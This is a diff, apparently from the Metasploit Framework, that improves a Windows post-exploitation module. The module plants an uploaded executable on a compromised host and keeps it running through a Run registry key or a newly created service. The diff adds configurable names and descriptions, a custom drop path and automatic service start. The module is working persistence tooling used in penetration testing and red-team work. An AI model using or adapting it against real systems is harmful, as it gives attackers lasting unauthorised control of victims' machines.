Land #9636, Improve post module persistence_exe

modules/post/windows/manage/persistence_exe.rb

@@ -3,12 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core/post/common'
-require 'msf/core/post/file'
-require 'msf/core/post/windows/priv'
-require 'msf/core/post/windows/registry'
-require 'msf/core/post/windows/services'
-
 class MetasploitModule < Msf::Post
   include Msf::Post::Common
   include Msf::Post::File
@@ -34,10 +28,18 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER', 'SYSTEM', 'SERVICE']]),
-        OptPath.new('REXEPATH', [true, 'The remote executable to use.']),
+        OptPath.new('REXEPATH', [true, 'The remote executable to upload and execute.']),
         OptString.new('REXENAME', [true, 'The name to call exe on remote system', 'default.exe'])
       ], self.class
     )
+
+    register_advanced_options(
+      [
+        OptString.new('LocalExePath', [false, 'The local exe path to run. Use temp directory as default. ']),
+        OptString.new('StartupName',   [false, 'The name of service or registry. Random string as default.' ]),
+        OptString.new('ServiceDescription',   [false, 'The description of service. Random string as default.' ])
+      ])
+
   end
 
   # Run Method for when run command is issued
@@ -123,11 +125,12 @@ class MetasploitModule < Msf::Post
   # Function to install payload in to the registry HKLM or HKCU
   #-------------------------------------------------------------------------------
   def write_to_reg(key, script_on_target)
-    nam = Rex::Text.rand_text_alpha(rand(8) + 8)
+    nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8) + 8)
     print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
     if key
       registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", nam, script_on_target, "REG_SZ")
       print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
+      @clean_up_rc << "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v '#{nam}'\n"
     else
       print_error("Error: failed to open the registry key for writing")
     end
@@ -138,9 +141,21 @@ class MetasploitModule < Msf::Post
   def install_as_service(script_on_target)
     if  is_system? || is_admin?
       print_status("Installing as service..")
-      nam = Rex::Text.rand_text_alpha(rand(8) + 8)
+      nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8) + 8)
+      description = datastore['ServiceDescription'] || Rex::Text.rand_text_alpha(8)
       print_status("Creating service #{nam}")
-      service_create(nam, :path=>"cmd /c \"#{script_on_target}\"")
+
+      key = service_create(nam, :path=>"cmd /c \"#{script_on_target}\"",:display=>description)
+
+      # check if service had been created
+      if key != 0
+        print_error("Service #{nam} creating failed.")
+        return
+      end
+
+      # if service is stopped, then start it.
+      service_start(nam) if service_status(nam)[:state] == 1
+
       @clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
     else
       print_error("Insufficient privileges to create service")
@@ -150,15 +165,34 @@ class MetasploitModule < Msf::Post
   # Function for writing executable to target host
   #-------------------------------------------------------------------------------
   def write_exe_to_target(rexe, rexename)
-    tempdir = session.fs.file.expand_path("%TEMP%")
+    # check if we have write permission
-    temprexe = tempdir + "\\" + rexename
+    # I made it by myself because the function filestat.writable? was not implemented yet.
+    if not datastore['LocalExePath'].nil?
+
+      begin
+        temprexe = datastore['LocalExePath'] + "\\" + rexename
+        write_file_to_target(temprexe,rexe)
+      rescue Rex::Post::Meterpreter::RequestError
+        print_warning("Insufficient privileges to write in #{datastore['LocalExePath']}, writing to %TEMP%")
+        temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
+        write_file_to_target(temprexe,rexe)
+      end
+
+    # Write to %temp% directory if not set LocalExePath
+    else
+      temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
+      write_file_to_target(temprexe,rexe)
+    end
+
+    print_good("Persistent Script written to #{temprexe}")
+    @clean_up_rc << "rm #{temprexe.gsub("\\", "\\\\\\\\")}\n"
+    temprexe
+  end
+
+  def write_file_to_target(temprexe,rexe)
     fd = session.fs.file.new(temprexe, "wb")
     fd.write(rexe)
     fd.close
-
-    print_good("Persistent Script written to #{temprexe}")
-    @clean_up_rc << "rm #{temprexe}\n"
-    temprexe
   end
 
   # Function to create executable from a file